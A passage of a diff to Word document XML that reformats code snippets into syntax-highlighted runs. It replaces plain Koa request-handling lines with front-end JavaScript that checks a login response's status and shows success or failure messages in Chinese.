+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>status</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> === </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="B5CEA8"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>200</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> &amp;&amp; </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>data</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>status</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> === </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="B5CEA8"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>0</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>){</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>if(ctx.request.method === 'post'){</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="6A9955"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>// location.href = '/';</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>data = ctx.request.body;</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'登录成功'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>);</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>} else {</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>        }</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="C586C0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>else</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>{</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
               </w:rPr>
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
-                <w:vertAlign w:val="baseline"/>
-                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>data = ctx.request.query;</w:t>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>modal</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>show</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>({</w:t>
             </w:r>
           </w:p>
           <w:p>
             <w:pPr>
-              <w:rPr>
-                <w:rFonts w:hint="default"/>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>                </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="9CDCFE"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>content:</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'登录失败'</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            });</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:keepNext w:val="0"/>
+              <w:keepLines w:val="0"/>
+              <w:widowControl/>
+              <w:suppressLineNumbers w:val="0"/>
+              <w:shd w:val="clear" w:fill="1E1E1E"/>
+              <w:spacing w:line="285" w:lineRule="atLeast"/>
+              <w:jc w:val="left"/>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>            </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="4EC9B0"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>console</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="DCDCAA"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>log</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="D4D4D4"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="default" w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
+                <w:b w:val="0"/>
+                <w:color w:val="CE9178"/>
+                <w:kern w:val="0"/>
+                <w:sz w:val="21"/>
+                <w:szCs w:val="21"/>
+                <w:shd w:val="clear" w:fill="1E1E1E"/>
+                <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+              </w:rPr>
+              <w:t>'登录失败'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
